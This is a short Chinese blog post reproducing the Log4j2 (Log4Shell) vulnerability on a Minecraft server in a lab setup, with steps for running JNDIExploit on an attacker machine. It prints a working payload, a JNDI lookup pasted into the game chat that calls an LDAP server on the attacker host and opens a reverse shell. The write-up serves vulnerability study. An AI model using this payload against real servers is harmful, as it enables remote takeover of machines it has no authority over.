Minecraft-ApacheLog4j2

Minecraft中的Log4j2漏洞复现

准备工作:

  • Minecraft服务器一台(靶机IP:targeted_ip)
  • Minecraft1.7-1.18官方服务端
  • 攻击机一台(攻击机IP:hacking_ip)

复现过程:

下载工具JNDIExploit

根据操作文档:

在攻击机上开启jndi服务:

攻击机开启监听端口:

根据操作文档,构造:

1
ldap://hacking_ip:1389/Basic/ReverseShell/hacking_ip/7890

最终payload:

1
${jndi:ldap://hacking_ip:1389/Basic/ReverseShell/hacking_ip/7890}

进入服务器,在聊天框内输入payload:

反弹shell:

可能导致线程崩溃,拿到shell之后重新开服即可

参考资料:

作者

Potat0w0

发布于

2023-10-11

更新于

2023-10-11

许可协议


评论